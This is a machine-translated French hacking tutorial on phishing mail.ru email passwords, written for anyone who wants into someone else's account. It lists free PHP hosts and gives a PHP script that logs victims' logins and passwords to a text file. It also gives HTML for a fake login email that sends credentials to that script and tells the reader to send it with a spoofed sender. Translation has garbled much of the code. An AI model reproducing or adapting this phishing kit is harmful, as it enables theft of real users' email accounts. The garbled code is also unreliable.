This page has been robot translated, sorry for typos if any. Original content here.

Casser le courrier à mail.ru [SI]

[::. INTRO. ::]

Salut Dans cet article, je parlerai de la manière de pirater une boîte aux lettres sur le service de messagerie gratuit mail.ru.

L'article est destiné aux débutants, en SI , ainsi qu'à tout internaute désirant accéder au compte de quelqu'un d'autre.

Mais bon, je n’écrirai pas longtemps avant, et je comprends donc "pourquoi un cracker a besoin d’une boîte aux lettres, vous comprendrez."

L'article conviendra aux débutants. Gourou, s'il vous plaît ne lisez pas :)

[::. PREPARATION. ::]

Nous avons d’abord besoin d’un hébergement gratuit (mieux payé) avec support PHP .

* Assurez-vous simplement que l'hébergement supporte PHP.

Vous pouvez vous inscrire sur l'un de ces éléments:

 nextmail.ru 
 hobby.ru 
 webrise.ru 
 lapin.ru 
 free.dl-hosting.ru 
 hostow.net 
 beplaced.ru 
 777host.ru 
 paltus.ru 
 miraclehost.ru 
 freebox.ru 
 alfaspace.net 
 k70.ru 
 hébergement.promostudio.ru 
 chat.ru 
 maxhost.ru 
 nixup.com 
 e2e.ru 
 noka.ru 
 newmail.ru 
 boom.ru 
 h15.ru 
 hut.ru 
 jino-net.ru 
 pochta.ru 
 unlimhost.ru 
 onepage.ru 
 by.ru 
 sbn.bz 
 yard.ru 
 domainhosting.ru 
 orthodoxie.ru 
 webservis.ru 
 ru-web.net 
 activehost.ru 
 househost.ru 
 bestof.ru 
 addr.ru 
 hébergement.dump.ru 
 pesni.ru 
 medbox.ru 
 fatal.ru 
 x5x.ru 
 hopshot.com 
 5gigs.com 
 wagoo.com 
 orgfree.com 
 awardspace.com 
 bobos.ca 
 www.host.sk 
 zportal.info 
 spaceall.de 
 3x.ro 
 sretenie.ru 
 dotgeek.org 
 sevhosting.net 
 o2g.net
 www.jino-net.ru
 www.nixup.com
 newmail.ru
 ho.com.ua
 wallSt.ru
 hut.ru
 holm.ru
 e2e.ru
 fatal.ru
 host.sk
 ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 narod.ru
 front.ru
 nm.ru 
 chat.ru 
 boom.ru 
 by.ru

Enregistré? - vas-y!

De quoi avons-nous besoin?

Tout d’abord, nous avons besoin d’un renifleur (c’est un script qui permet de sauvegarder les données reçues dans un fichier texte).


Code PHP:
  <? php
 
  $ f = fopen ( "mail.txt" , "at" );
  # fichier où enregistrer le troupeau ( $ f , 2 );
  fputs ( $ f , $ _GET [ 'Login' ]. "" @ " );
  # login fputs ( $ f , $ _GET [ 'Domaine' ]);
  # entrée de domaine ( $ f , ";" . $ _GET [ 'Password' ]. "\ n" );
  # mot de passe flock ( $ f , 3 );
  fclose ( $ f );
  ?> <script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>

Considérez le script plus en détail.


Code PHP:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Cette ligne définit l'endroit où nous redirigerons l'utilisateur après autorisation sur la fausse lettre .

  • Enregistrer dans le fichier mes.php et le télécharger sur l'hébergement.
  • Créez également un fichier mail.txt dans le répertoire de script et définissez les autorisations correspondantes (chmod) 777.

Peut-être avec l'hébergement - tout!

Nous procédons à la lettre elle-même, que nous enverrons à la victime sur le savon.


Code de lettre:
  < table class = readlet cellpadding = 0 cellspacing = 0 border = 0 width = "100%" > < tr >
 
  < td id = aj_body >
 
  < div id = let_body > < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" >
 
  < table cellpadding = 0 cellpacing = 0 border = 0 class = login >
 
  < tr >
 
  < td > L' utilisateur vous a envoyé une lettre cachée . <br> Pour afficher la lettre, entrez votre nom d'utilisateur et votre mot de passe . <br> </ a > </ p > </ td >
 
  </ tr >
 
  </ table > < font color = 00 ;
  33 ;
  66 FACE = "Arial" >
 
  < h4 > Autorisation </ h4 >
 
  </ font >
 
  < table cellpadding = 0 cellpacing = 0 border = 0 class = login >
 
  < form method = "GET" action = "http: //addresssayta/mes.php" >
 
  < type d'entrée = "caché" name = "mail" value = "1" >
 
  < tr >
 
  < largeur td = 75 >
 
  < img src = http : //img.mail.ru/0.gif height = 1> <br> Nom
 
  </ td >
 
  < largeur td = 150 >
 
  < input type = "text" name = "Login" >
 
  </ td >
 
  < largeur td = 75 >
 
  < select name = "Domain" >
 
  < option value = "mail.ru" SELECTED > @ mail .
  ru </ option >
 
  < option value = "inbox.ru" > @ inbox .
  ru </ option >
 
  < option value = "list.ru" > @list.
  ru </ option >
 
  < option value = "bk.ru" > @ bk .
  ru </ option >
 
  </ select >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td >
 
  Mot de passe
 
  </ td >
 
  < td >
 
  < type d'entrée = "mot de passe" name = "Mot de passe" >
 
  </ td >
 
  < td >
 
  <a href = "http://www.mail.ru/pages/help/92.html" target = _new> Mot de passe oublié ? </ a >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < type d'entrée = case à cocher nom = "niveau" valeur = 1 id = "étranger" > < label pour = "étranger" > ordinateur étranger </ label >
 
  </ td >
 
  < td > </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = "Submit" value = "Login" xstyle = "margin-top: 4px" >
 
  </ td >
 
  < td > </ td >
 
  </ tr > </ form >
 
  </ table > <br>
 
  Pour en savoir plus sur les services , visitez le site <a href = "http://corp.mail.ru" target = "_blank"> Corp.
  Mail
  Ru </ a > <br>
 
  Service postal national <a href = "http://www.mail.ru" target = "_blank"> @ Mail .
  com </ a > - le meilleur courrier gratuit .
 
  < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" > </ div >
 
 

Entrez l'adresse de formulaire de votre site (que vous avez enregistrée ci-dessus) et le chemin d'accès au renifleur mes.php dans la balise d' action de la balise de formulaire .

[!] Il convient de noter que les données doivent être transférées à l'aide de la méthode "GET"! Sinon, rien n'en sortira.

Il reste maintenant à envoyer une lettre à la victime, de préférence avec substitution de l'adresse .

Copiez le code de lettre dans le champ de saisie et envoyez-le au format html en remplissant préalablement les champs.

Si la victime le mord, alors vous avez de la chance :)

Vous pouvez apprendre les mots de passe dans le fichier mail.txt.

[::. FIN. ::]

Je pense tout.

Mais comment arriver à la fissuration est à vous.

Merci pour votre attention!

En attente de vos commentaires juste en dessous de ce texte.

Et mieux vaut ne rien casser;)

Au revoir et à bientôt :)